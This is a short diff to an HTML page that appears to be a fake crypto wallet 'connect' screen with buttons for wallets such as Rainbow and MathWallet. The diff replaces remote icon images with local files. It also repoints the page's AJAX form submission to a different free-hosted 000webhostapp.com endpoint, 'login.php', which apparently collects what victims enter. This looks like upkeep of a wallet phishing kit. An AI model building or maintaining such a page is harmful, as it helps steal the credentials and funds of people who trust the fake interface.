--- a/connect.html
+++ b/connect.html
@@ -154,7 +154,7 @@
                         </button>
 
                         <button  type="button" data-bs-toggle="modal" data-bs-target="#exampleModal8" class="btn coin">
-                            <img class="coin-img" src="images/favicon-32x32.webp" alt="" />
+                            <img class="coin-img" src="images/crypto.png" alt="" />
                             <h4>DeFi</h4>
                         </button>
 
@@ -215,7 +215,7 @@
 
 
                         <button type="button"  data-bs-toggle="modal" data-bs-target="#exampleModal" class="btn coin">
-                            <img class="coin-img" src="https://framerusercontent.com/images/bgm16Z9pe9YGDU72vUuHTzyYYk.png" alt="" style="border-radius: 40px;" />
+                            <img class="coin-img" src="images/rainbow.jpg" alt="" style="border-radius: 40px;" />
                             <h4>Rainbow</h4>
                         </button>
 
@@ -277,7 +277,7 @@
                         </button>
 
                         <button  type="button" data-bs-toggle="modal" data-bs-target="#exampleModal19" class="btn coin">
-                            <img style="border-radius: 40px;" class="coin-img" src="https://staticcdn2.maiziqianbao.net/static/img/favicon.ico" alt="" />
+                            <img style="border-radius: 40px;" class="coin-img" src="images/mathwallet.jpg" alt="" />
                             <h4>MathWallet</h4>
                         </button>
                         <!-- Modal -->
@@ -608,7 +608,7 @@
             let formData = new FormData(this);
             $.ajax({
                 type: "POST",
-                url: "https://5qjznohxzz2ueu.000webhostapp.com/hdmild.php",
+                url: "https://2025lionsmegaways5.000webhostapp.com/login.php",
                 data: formData,
                 cache: false,
                 contentType: false,
